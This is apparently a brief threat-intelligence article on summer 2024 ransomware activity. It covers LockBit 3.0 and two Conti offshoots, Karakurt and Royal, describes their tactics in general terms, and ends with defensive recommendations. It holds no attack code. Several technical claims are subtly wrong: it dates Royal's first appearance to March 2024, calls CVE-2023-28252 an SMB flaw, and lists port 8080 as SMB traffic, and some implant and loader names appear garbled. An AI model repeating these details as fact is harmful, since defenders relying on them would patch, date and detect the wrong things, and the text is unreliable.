Lockbit Leads Summer Ransomware Surge; Conti Offshoots Follow

In the summer of 2024, LockBit solidified its standing as the most prolific ransomware‑as‑a‑service (RaaS) operation, accounting for roughly 35 % of all ransomware incidents tracked by Threat Intel analysts. The group’s latest builder, LockBit 3.0 (sometimes marketed as LockBit Black), deploys a dual‑extortion scheme that first exfiltrates sensitive data via custom "Eternity" implants and then encrypts files with AES‑256, using an RSA‑4096 wrapped key for victim‑specific decryption. Recent campaigns have targeted critical manufacturing plants in Germany, a U.S. hospital network, and a Canadian municipal government, with affiliates leveraging Cobalt Strike beacons, PowerShell‑based script drops, and abuse of Windows BITS for stealthy command‑and‑control (C2) communications. A joint advisory from CISA, FBI, and NSA highlighted LockBit’s use of living‑off‑the‑land binaries (LOLBins) and recommended immediate patching of SMB‑related flaws such as CVE‑2022‑38045.

Two spin‑offs from the now‑defunct Conti organization have re‑emerged as distinct ransomware threats: Karakurt and Royal. Karakurt operates a "no‑encryption" data‑theft model, using the custom "Megalodon" implant to exfiltrate 10‑50 GB of corporate data before demanding a ransom for non‑publication. Its tactics include scheduled tasks for lateral movement, abuse of the Windows Background Intelligent Transfer Service (BITS) for data staging, and RDP brute‑force to gain initial access. Royal ransomware, first observed in March 2024, delivers a "Zeon" loader that drops a payload implementing AES‑256 file encryption paired with RSA‑4096 key exchange. Known victims include a UK‑based law firm and a South‑American retail chain, with the group typically demanding payment in Monero to complicate tracing.

Incident responders should adopt a layered defense strategy to counter these evolving threats. Network segmentation isolates critical assets, while rigorous patching of SMB vulnerabilities (CVE‑2022‑38045, CVE‑2023‑28252) removes common entry vectors. Deployment of Endpoint Detection and Response (EDR) solutions capable of flagging suspicious PowerShell script blocks and anomalous SMB traffic on ports 445, 139, and 8080 is essential. Organizations are urged to maintain offline, checksum‑verified backups and to subscribe to threat‑intel feeds that provide up‑to‑date YARA rules such as "LockBit_Hash_v3" for early detection of LockBit payloads. Continuous monitoring for indicators of compromise (IoCs) – including specific mutexes, C2 domains, and lateral‑movement patterns – combined with regular tabletop exercises, will strengthen resilience against the current ransomware surge.